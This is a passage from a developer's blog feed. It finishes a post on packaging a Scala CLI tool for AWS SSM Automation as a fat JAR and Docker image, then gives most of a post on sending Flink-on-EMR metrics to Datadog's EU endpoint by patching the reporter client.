&lt;p>At this point the CLI app was ready and I wanted to see how it would function. Before I could run it, I needed to figure out how to package everything into a &lt;code>fat&lt;/code> JAR file with all the needed dependencies, so that it could be invoked with CLI arguments. I googled around a bit and quickly found the
&lt;a href="https://docs.spring.io/spring-boot/docs/1.5.x/maven-plugin/repackage-mojo.html" target="_blank" rel="noopener">spring-boot-maven-plugin&lt;/a> which has the &lt;code>repackage&lt;/code> goal that&amp;rsquo;s just what I needed:&lt;/p>
&lt;blockquote>
&lt;p>Repackages existing JAR and WAR archives so that they can be executed from the command line using java -jar. With layout=NONE can also be used simply to package a JAR with nested dependencies (and no main class, so not executable).&lt;/p>
&lt;/blockquote>
&lt;p>I only had to add the below lines to my project&amp;rsquo;s &lt;strong>pom.xml&lt;/strong>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-xml" data-lang="xml">&lt;span class="nt">&amp;lt;plugin&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;groupId&amp;gt;&lt;/span>org.springframework.boot&lt;span class="nt">&amp;lt;/groupId&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;artifactId&amp;gt;&lt;/span>spring-boot-maven-plugin&lt;span class="nt">&amp;lt;/artifactId&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;version&amp;gt;&lt;/span>2.3.2.RELEASE&lt;span class="nt">&amp;lt;/version&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;configuration&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;layout&amp;gt;&lt;/span>JAR&lt;span class="nt">&amp;lt;/layout&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/configuration&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;executions&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;execution&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;goals&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;goal&amp;gt;&lt;/span>repackage&lt;span class="nt">&amp;lt;/goal&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/goals&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/execution&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/executions&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/plugin&amp;gt;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next I just had to run the &lt;code>mvn package&lt;/code> command, which invokes the plugin to build the &lt;code>fat&lt;/code> JAR.&lt;/p>
&lt;h2 id="running-the-cli-app">Running the CLI app&lt;/h2>
&lt;p>Once the JAR is available, it can be used via the &lt;code>java -jar ...&lt;/code> command with extra arguments to run any Automation Document, such as &lt;code>AWS-StartEC2Instance&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">$ ▶ java -jar ./target/scala-cli-app-1.0.0.jar --document&lt;span class="o">=&lt;/span>AWS-StartEC2Instance &lt;span class="nv">InstanceId&lt;/span>&lt;span class="o">=&lt;/span>i-0ed4574c5ba94c877 &lt;span class="nv">AutomationAssumeRole&lt;/span>&lt;span class="o">=&lt;/span>arn:aws:iam::&lt;span class="o">{{&lt;/span>global:ACCOUNT_ID&lt;span class="o">}}&lt;/span>:role/AutomationServiceRole
15:24:41.998 &lt;span class="o">[&lt;/span>main&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Going to kick off SSM orchestration document: AWS-StartEC2Instance
15:24:42.773 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-29&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Execution id: &amp;lt;...&amp;gt;
15:24:42.882 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-11&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Current status: &lt;span class="o">[&lt;/span>InProgress&lt;span class="o">]&lt;/span>, retry counter: &lt;span class="c1">#0&lt;/span>
&lt;span class="o">[&lt;/span>...&lt;span class="o">]&lt;/span>
15:28:01.226 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-11&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Current status: &lt;span class="o">[&lt;/span>InProgress&lt;span class="o">]&lt;/span>, retry counter: &lt;span class="c1">#21&lt;/span>
15:28:16.442 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-11&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Execution finished with final status: &lt;span class="o">[&lt;/span>Success&lt;span class="o">]&lt;/span>
15:28:16.444 &lt;span class="o">[&lt;/span>main&lt;span class="o">]&lt;/span> INFO com.flrnks.app.SsmCliParser :: SSM execution run took &lt;span class="m">215&lt;/span> seconds
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Seems to be working quite well!&lt;/p>
&lt;h2 id="bonus-running-in-a-container">Bonus: running in a container&lt;/h2>
&lt;p>I thought I would take the above one step further and package the JAR into a Java-based Docker container. This way I don&amp;rsquo;t have to remember the syntax of the &lt;code>java&lt;/code> command I previously used to run the app; instead, I can hide it in a very minimal Dockerfile:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-dockerfile" data-lang="dockerfile">&lt;span class="k">FROM&lt;/span>&lt;span class="s"> openjdk:8-jdk-alpine&lt;/span>&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">MAINTAINER&lt;/span>&lt;span class="s"> flrnks &amp;lt;flrnks@flrnks.netlify.com&amp;gt;&lt;/span>&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">ADD&lt;/span> target/scala-cli-app-1.0.0.jar /usr/share/backend/app.jar&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">ENTRYPOINT&lt;/span> &lt;span class="p">[&lt;/span> &lt;span class="s2">&amp;#34;/usr/bin/java&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s2">&amp;#34;-jar&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s2">&amp;#34;/usr/share/backend/app.jar&amp;#34;&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="err">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The &lt;code>mvn package&lt;/code> command used to build the fat JAR saves it into the &lt;strong>/target&lt;/strong> subdirectory, so one can put this Dockerfile into the project&amp;rsquo;s root and manually build the Docker image by running &lt;code>docker build -t ssmcli .&lt;/code>. This creates an image called &lt;strong>ssmcli&lt;/strong> without issues; however, I found an awesome plugin called &lt;code>dockerfile-maven-plugin&lt;/code> built by
&lt;a href="https://github.com/spotify/dockerfile-maven" target="_blank" rel="noopener">Spotify&lt;/a> which can automagically take this Dockerfile and turn it into an image based on the plugin configuration:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-xml" data-lang="xml">&lt;span class="nt">&amp;lt;plugin&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;groupId&amp;gt;&lt;/span>com.spotify&lt;span class="nt">&amp;lt;/groupId&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;artifactId&amp;gt;&lt;/span>dockerfile-maven-plugin&lt;span class="nt">&amp;lt;/artifactId&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;version&amp;gt;&lt;/span>1.4.10&lt;span class="nt">&amp;lt;/version&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;executions&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;execution&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;id&amp;gt;&lt;/span>default&lt;span class="nt">&amp;lt;/id&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;goals&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;goal&amp;gt;&lt;/span>build&lt;span class="nt">&amp;lt;/goal&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/goals&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;configuration&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;repository&amp;gt;&lt;/span>flrnks/ssmcli&lt;span class="nt">&amp;lt;/repository&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;tag&amp;gt;&lt;/span>latest&lt;span class="nt">&amp;lt;/tag&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/configuration&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/execution&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/executions&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/plugin&amp;gt;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This plugin hooks into the &lt;code>mvn package&lt;/code> goal, and when it&amp;rsquo;s executed it automatically creates the Docker image:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> --- spring-boot-maven-plugin:2.3.2.RELEASE:repackage &lt;span class="o">(&lt;/span>default&lt;span class="o">)&lt;/span> @ scala-cli-app ---
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Layout: JAR
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Replacing main artifact with repackaged archive
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span>
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> --- dockerfile-maven-plugin:1.4.10:build &lt;span class="o">(&lt;/span>default&lt;span class="o">)&lt;/span> @ scala-cli-app ---
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> dockerfile: null
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> contextDirectory: /Users/flszabo/Desktop/personal-wrkspc/scala/scala-cli-app
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Building Docker context /Users/flszabo/Desktop/personal-wrkspc/scala/scala-cli-app
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Path&lt;span class="o">(&lt;/span>dockerfile&lt;span class="o">)&lt;/span>: null
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Path&lt;span class="o">(&lt;/span>contextDirectory&lt;span class="o">)&lt;/span>: /Users/flszabo/Desktop/personal-wrkspc/scala/scala-cli-app
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span>
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Image will be built as flrnks/ssmcli:latest
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Step 1/4 : FROM openjdk:8-jdk-alpine
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Pulling from library/openjdk
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Digest: sha256:94792824df2df33402f201713f932b58cb9de94a0cd524164a0f2283343547b3
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Status: Image is up to date &lt;span class="k">for&lt;/span> openjdk:8-jdk-alpine
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> ---&amp;gt; a3562aa0b991
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Step 2/4 : MAINTAINER flrnks &amp;lt;flrnks@flrnks.netlify.com&amp;gt;
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> ---&amp;gt; Using cache
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> ---&amp;gt; efcc673b4f35
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Step 3/4 : ADD target/scala-cli-app-1.0.0.jar /usr/share/backend/app.jar
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> ---&amp;gt; 8b2cf76f03c2
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Step 4/4 : ENTRYPOINT &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;/usr/bin/java&amp;#34;&lt;/span>, &lt;span class="s2">&amp;#34;-jar&amp;#34;&lt;/span>, &lt;span class="s2">&amp;#34;/usr/share/backend/app.jar&amp;#34;&lt;/span>&lt;span class="o">]&lt;/span>
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> ---&amp;gt; Running in c9633237f9fa
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Removing intermediate container c9633237f9fa
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> ---&amp;gt; 6db69aa30fb1
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Successfully built 6db69aa30fb1
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Successfully tagged flrnks/ssmcli:latest
&lt;/code>&lt;/pre>&lt;/div>&lt;p>To test the new Docker image I ran the &lt;code>AWS-StopEC2Instance&lt;/code> Automation Document with the same CLI arguments as before, thanks to the &lt;code>ENTRYPOINT&lt;/code> configuration in the Dockerfile. As an extra step I needed to share the AWS profile with the container at runtime using the flag &lt;code>-v ~/.aws:/root/.aws&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">$ ▶ ddocker run --rm -v ~/.aws:/root/.aws flrnks/ssmcli --document&lt;span class="o">=&lt;/span>AWS-StopEC2Instance &lt;span class="nv">InstanceId&lt;/span>&lt;span class="o">=&lt;/span>i-0ed4574c5ba94c877 &lt;span class="nv">AutomationAssumeRole&lt;/span>&lt;span class="o">=&lt;/span>arn:aws:iam::&lt;span class="o">{{&lt;/span>global:ACCOUNT_ID&lt;span class="o">}}&lt;/span>:role/AutomationServiceRole
17:18:59.541 &lt;span class="o">[&lt;/span>main&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Going to kick off SSM orchestration document: AWS-StopEC2Instance
17:19:00.789 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-13&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Execution id: &amp;lt;...&amp;gt;
17:19:00.966 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-11&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Current status: &lt;span class="o">[&lt;/span>InProgress&lt;span class="o">]&lt;/span>, retry counter: &lt;span class="c1">#0&lt;/span>
17:19:03.564 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-11&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Execution finished with final status: &lt;span class="o">[&lt;/span>Success&lt;span class="o">]&lt;/span>
17:19:03.568 &lt;span class="o">[&lt;/span>main&lt;span class="o">]&lt;/span> INFO com.flrnks.app.SsmCliParser :: SSM execution run took &lt;span class="m">5&lt;/span> seconds
&lt;/code>&lt;/pre>&lt;/div>&lt;p>One may say that typing the long &lt;code>docker run ...&lt;/code> command above takes longer than typing &lt;code>java -jar ./target/scala-cli-app-1.0.0.jar ...&lt;/code>, but I would argue that running the app inside a Docker container has valid use-cases as well: it allows for a controlled setup of the runtime environment and prevents dependency issues too!&lt;/p>
&lt;h2 id="conclusion">Conclusion&lt;/h2>
&lt;p>This project has allowed me to learn much more than I initially expected. I learnt a lot about Scala, which was the original goal, but I also gained valuable experience with Maven, its plugin ecosystem and of course with Java as well. I hope whoever reads this post will find something useful in it too!&lt;/p></description></item><item><title>Monitoring Flink on AWS EMR</title><link>https://flrnks.netlify.app/post/emr-flink-datadog/</link><pubDate>Sun, 16 Aug 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/emr-flink-datadog/</guid><description>&lt;h2 id="brief-intro">Brief intro&lt;/h2>
&lt;p>This is going to be a somewhat unusual post on this blog. It is about a problem I recently encountered while trying to improve the monitoring of a long-running Flink cluster we have on AWS EMR, following the official
&lt;a href="https://docs.datadoghq.com/integrations/flink/" target="_blank" rel="noopener">documentation&lt;/a> from Datadog.&lt;/p>
&lt;h2 id="the-emr-setup">The EMR setup&lt;/h2>
&lt;p>Our EMR cluster consumes 4 Kinesis Data Streams, which are used to send S3 files in AVRO format for processing. When a new file arrives, the Flink job fetches it from S3, does some validation and filtering, then converts it to ORC format and saves it to a new location on S3. In early June we experienced a failure in one of the Flink jobs consuming a production stream. Sadly, we did not have adequate monitoring set up to detect this in time; we only learnt about it when we noticed that data in the output bucket was missing for certain dates. Our streams were configured with the maximum retention period of 7 days. By the time we noticed, the unprocessed data was already piling up in the stream, and the oldest records were close to half of this retention period. By the time we managed to find the root cause and deploy a fix to the Flink job, it was too late, and some data had already expired from the stream.&lt;/p>
&lt;p>The existing monitoring solution was implemented via AWS Lambda functions running every 8 hours. These functions made Athena queries to check whether any data had arrived in the S3 bucket during the last 48 hours. The problem with this approach was that we would not get alerts about missing data for up to 2 days, because our query used a sliding window of 2 days.&lt;/p>
&lt;p>The Flink cluster runs in a private VPC, so reaching the Flink Web UI to check the status of the jobs was quite difficult, to say the least. We either had to set up an SSH port-forwarding session and use a FoxyProxy setup in Firefox, or set up a personal VM in the same private VPC via the AWS WorkSpaces managed service and then connect from that VM&amp;rsquo;s browser to the cluster&amp;rsquo;s Flink UI. Either way, connecting to the Flink UI to check cluster health was cumbersome and still a manual process. I wanted an automated way of gathering metrics and alerting if something went wrong, so I looked into how Flink could be monitored with Datadog.&lt;/p>
&lt;h2 id="datadog--flink">Datadog ❤️ Flink&lt;/h2>
&lt;p>A quick Google search turned up the official documentation from Datadog, where I found really straightforward instructions on enabling the submission of Flink metrics to Datadog, which could be instantly visualized in their default Flink dashboard. The main steps are:&lt;/p>
&lt;ul>
&lt;li>adding some new parameters to the flink-conf.yaml, such as the Datadog API/APP keys and custom tags&lt;/li>
&lt;li>copying the &lt;code>flink-datadog-metrics.jar&lt;/code> to the active flink installation path&lt;/li>
&lt;/ul>
&lt;p>The first step was quite easy. Our cluster was defined in Cloudformation where we used &lt;code>AWS::EMR::Cluster&lt;/code> which allows specifying the flink-conf.yaml content as below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yaml" data-lang="yaml">&lt;span class="k">Cluster&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Type&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>AWS&lt;span class="p">::&lt;/span>EMR&lt;span class="p">::&lt;/span>Cluster&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Properties&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Name&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>Flink-Cluster&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Configurations&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- &lt;span class="k">Classification&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>flink-conf&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">ConfigurationProperties&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.class&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>org.apache.flink.metrics.datadog.DatadogHttpReporter&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.apikey&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="s1">&amp;#39;{{resolve:secretsmanager:datadog/api_key:SecretString}}&amp;#39;&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.tags&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>name&lt;span class="p">:&lt;/span>flink-cluster&lt;span class="p">,&lt;/span>&lt;span class="w"> &lt;/span>app&lt;span class="p">:&lt;/span>flink-cluster&lt;span class="p">,&lt;/span>&lt;span class="w"> &lt;/span>region&lt;span class="p">:&lt;/span>eu-central&lt;span class="m">-1&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="w"> &lt;/span>env&lt;span class="p">:&lt;/span>prod&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="p">[&lt;/span>...&lt;span class="p">]&lt;/span>&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The above CF snippet shows just the 3 most important lines of the &lt;strong>flink-conf.yaml&lt;/strong>: (1) the full package name of the java class which implements the metric submission, (2) the Datadog API key loaded from AWS Secrets Manager and (3) a few custom tags which will be added to metrics sent to Datadog.&lt;/p>
&lt;p>To copy the necessary datadog-metrics JAR to the path it would be loaded from (&lt;code>/usr/lib/flink/lib&lt;/code>), I added a new &lt;code>AWS::EMR::Step&lt;/code> in CloudFormation which is executed only on the EMR Master Node, activating Datadog monitoring on the cluster via the Java class and API key supplied in the &lt;strong>flink-conf.yaml&lt;/strong>.&lt;/p>
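&lt;p>A minimal sketch of what such a bootstrap step could look like in the same CloudFormation template (the step name, bucket and JAR path here are illustrative assumptions, not the exact ones we used):&lt;/p>

```yaml
DatadogJarStep:
  Type: AWS::EMR::Step
  Properties:
    JobFlowId: !Ref Cluster
    Name: install-datadog-metrics-jar
    ActionOnFailure: CONTINUE
    HadoopJarStep:
      Jar: command-runner.jar
      Args:
        - bash
        - -c
        # Copy the reporter JAR into the path Flink loads plugins from
        - aws s3 cp s3://my-team-bucket/flink-metrics-datadog.jar /usr/lib/flink/lib/
```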
&lt;p>To test that it was working properly I just needed to redeploy the cluster, which was surprisingly easy thanks to the CloudFormation setup we had in place. But something was still not right.&lt;/p>
&lt;h2 id="know-your-continent">Know your continent&lt;/h2>
&lt;p>After redeploying the cluster I waited and waited and waited a bit more, but metrics were not showing up in the Flink dashboard. So I got in touch with Datadog support, who were very helpful in figuring out what the issue was. After a few rounds of emails back and forth, we discovered why the metrics were not showing up.&lt;/p>
&lt;p>The reason was that we had our Datadog account set up in the EU region and not in the USA. Thus, all our metrics were supposed to flow to the EU endpoint at &lt;code>app.datadoghq.eu/api/&lt;/code> instead of the USA endpoint at &lt;code>app.datadoghq.com/api/&lt;/code>. The difference is quite subtle, only a simple change in the TLD from &lt;strong>.com&lt;/strong> to &lt;strong>.eu&lt;/strong>. The catch was that our EMR cluster was running Flink 1.9.1 (provided by the EMR release 5.29.0) which had this API endpoint hardcoded, pointing to the USA data centre. The Datadog Support Engineer uncovered some extra
&lt;a href="https://ci.apache.org/projects/flink/flink-docs-stable/monitoring/metrics.html#datadog-orgapacheflinkmetricsdatadogdatadoghttpreporter" target="_blank" rel="noopener">instructions&lt;/a> on how this can be solved by adding an extra line to the &lt;strong>flink-conf.yaml&lt;/strong> to change the default US region to the EU instead:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yaml" data-lang="yaml">&lt;span class="k">Cluster&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Type&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>AWS&lt;span class="p">::&lt;/span>EMR&lt;span class="p">::&lt;/span>Cluster&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Properties&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Name&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>Flink-Cluster&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="p">[&lt;/span>...&lt;span class="p">]&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Configurations&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- &lt;span class="k">Classification&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>flink-conf&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">ConfigurationProperties&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="p">[&lt;/span>...&lt;span class="p">]&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.class&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>org.apache.flink.metrics.datadog.DatadogHttpReporter&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.apikey&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="s1">&amp;#39;{{resolve:secretsmanager:datadog/api_key:SecretString}}&amp;#39;&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.tags&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>name&lt;span class="p">:&lt;/span>flink-cluster&lt;span class="p">,&lt;/span>&lt;span class="w"> &lt;/span>app&lt;span class="p">:&lt;/span>flink-cluster&lt;span class="p">,&lt;/span>&lt;span class="w"> &lt;/span>region&lt;span class="p">:&lt;/span>eu-central&lt;span class="m">-1&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="w"> &lt;/span>env&lt;span class="p">:&lt;/span>prod&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.dataCenter&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>EU&lt;span class="w"> &lt;/span>&lt;span class="c"># &amp;lt;&amp;lt; points the metrics reported to the EU region&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="p">[&lt;/span>...&lt;span class="p">]&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The problem was that this option only became available in Flink v1.11.0, while the highest version offered through the latest EMR release was v1.10.0, so this was not going to work for me. I had almost given up on the idea of monitoring Flink via Datadog when I thought of cloning the official Flink repository from GitHub and tweaking the v1.9.1 code we were running, changing the hardcoded API endpoint from &lt;strong>.com&lt;/strong> to &lt;strong>.eu&lt;/strong>. It was much easier than I expected; I just needed to slightly tweak the class &lt;code>./src/main/java/org/apache/flink/metrics/datadog/DatadogHttpClient.java&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-java" data-lang="java">&lt;span class="cm">/**
&lt;/span>&lt;span class="cm"> * Http client talking to Datadog.
&lt;/span>&lt;span class="cm"> */&lt;/span>
&lt;span class="kd">public&lt;/span> &lt;span class="kd">class&lt;/span> &lt;span class="nc">DatadogHttpClient&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="cm">/* Changed endpoint for metric submission to use .eu instead of .com */&lt;/span>
&lt;span class="kd">private&lt;/span> &lt;span class="kd">static&lt;/span> &lt;span class="kd">final&lt;/span> &lt;span class="n">String&lt;/span> &lt;span class="n">SERIES_URL_FORMAT&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s">&amp;#34;https://app.datadoghq.eu/api/v1/series?api_key=%s&amp;#34;&lt;/span>&lt;span class="o">;&lt;/span>
&lt;span class="cm">/* Changed endpoint for API key validation to use .eu instead of .com */&lt;/span>
&lt;span class="kd">private&lt;/span> &lt;span class="kd">static&lt;/span> &lt;span class="kd">final&lt;/span> &lt;span class="n">String&lt;/span> &lt;span class="n">VALIDATE_URL_FORMAT&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s">&amp;#34;https://app.datadoghq.eu/api/v1/validate?api_key=%s&amp;#34;&lt;/span>&lt;span class="o">;&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Once I had made the above code changes, I built a new JAR via &lt;code>mvn clean package&lt;/code>. The new JAR appeared at &lt;strong>./flink-metrics/flink-metrics-datadog/target/flink-metrics-datadog-1.9.1.jar&lt;/strong>, which I then uploaded to the S3 bucket where my team stores such files. Next I slightly tweaked the AWS EMR step to load this JAR from S3 and redeployed the cluster once more. Finally, metrics started flowing! And it looked so nice; I was especially happy to see the TaskManager heap distribution, because the issue which sparked this whole endeavor had shown symptoms of heap memory problems.&lt;/p>
&lt;p>&lt;img src="./images/default-dashboard.png" alt="Default Datadog Flink Dashboard">&lt;/p>
&lt;p>Unfortunately this default dashboard was not perfect, as some of its graphs failed to show any data. Maybe it was because we used v1.9.1 of Flink instead of v1.11.0; I am not sure. In any case, I ended up cloning the dashboard and fixing the graphs manually, while also adding a few extras to show data about the AWS Kinesis streams feeding into the Flink cluster.&lt;/p>
&lt;p>&lt;img src="./images/custom-dashboard.jpg" alt="Custom Datadog Flink dashboard">&lt;/p>
&lt;p>Now it shows very nicely the age of each Flink job, which was not visible at all on the default dashboard. The end result is much better in my opinion.&lt;/p>
&lt;h2 id="conclusion">Conclusion&lt;/h2>
